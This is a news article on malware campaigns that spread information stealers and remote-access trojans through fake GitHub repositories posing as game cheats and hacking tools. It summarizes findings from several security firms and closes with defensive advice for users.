GitHub Malware Campaign Targets Gamers and Developers with Trojanized Repositories
A major cybersecurity alert has surfaced, revealing that over 200 malicious GitHub repositories have been used in a coordinated malware campaign aimed at gamers and novice developers. These repositories masqueraded as open-source hacking tools and utilities but were actually embedded with trojanized payloads and backdoors, according to researchers at ReversingLabs.
Dubbed “Banana Squad”, the campaign builds upon a 2023 attack on the Python Package Index (PyPI), where rogue Python packages were downloaded over 75,000 times. The newer wave sees 67 GitHub repositories mimicking legitimate projects, such as Discord account cleaners, Fortnite cheats, TikTok tools, and PayPal bulk checkers, to lure unsuspecting users.
These malicious repositories were designed to install Python-based information stealers and other malware capable of targeting cryptocurrency wallets, such as Exodus, and exfiltrating sensitive data to external servers.
“Trojanized code and backdoors in open-source platforms like GitHub are now a rising software supply chain threat,” warned Robert Simmons from ReversingLabs.
GitHub’s Role in Malware Distribution
GitHub has become a central hub for distributing malware in recent campaigns:
- Trend Micro identified 76 malicious repositories operated by a group dubbed Water Curse, which deploys multi-stage payloads to steal credentials, session tokens, and browser data.
- Check Point exposed the Stargazers Ghost Network, a network of fake GitHub accounts pushing Java-based malware targeting Minecraft users.
- These repositories often rely on artificial popularity using fake stars, forks, and subscriptions to rank higher in GitHub search results.
Wider Distribution-as-a-Service (DaaS) Threat
Researchers believe these campaigns are part of a larger Distribution-as-a-Service (DaaS) operation that has been active since August 2022, utilizing:
- Discord servers
- YouTube channels
- Thousands of GitHub ‘ghost’ accounts
These DaaS networks often bait inexperienced cybercriminals looking for free malware tools, embedding trojans in downloadable source code.
Sophos: 133 Backdoored Repositories Discovered
Sophos also uncovered a repository named Sakura-RAT that deployed malware upon compilation. In total, at least 133 backdoored repositories were found:
- 111 contained Visual Studio PreBuild backdoors
- Others used Python scripts, JavaScript, and even screensaver files to compromise victims.
Malware observed in this campaign includes:
- AsyncRAT
- Remcos RAT
- Lumma Stealer
These tools steal sensitive data, take screenshots, provide remote access, and download further malware—all without the victim’s knowledge.
What’s Next?
While the precise origins and coordination behind the campaign remain unclear, cybersecurity analysts believe that such attacks will continue to evolve and target wider groups beyond the current gaming and developer communities.
“The approach is both popular and effective. We may see the same tactics aimed at enterprises or open-source software developers in the future,” said Sophos.
✅ Key Takeaways:
- Over 200 GitHub repositories have been weaponized.
- Malware targets include gamers, crypto users, and developers.
- Threat actors are exploiting GitHub’s trust and visibility to deliver backdoors.
- Users are urged to validate repositories carefully before use and to avoid downloading tools from unverified sources.
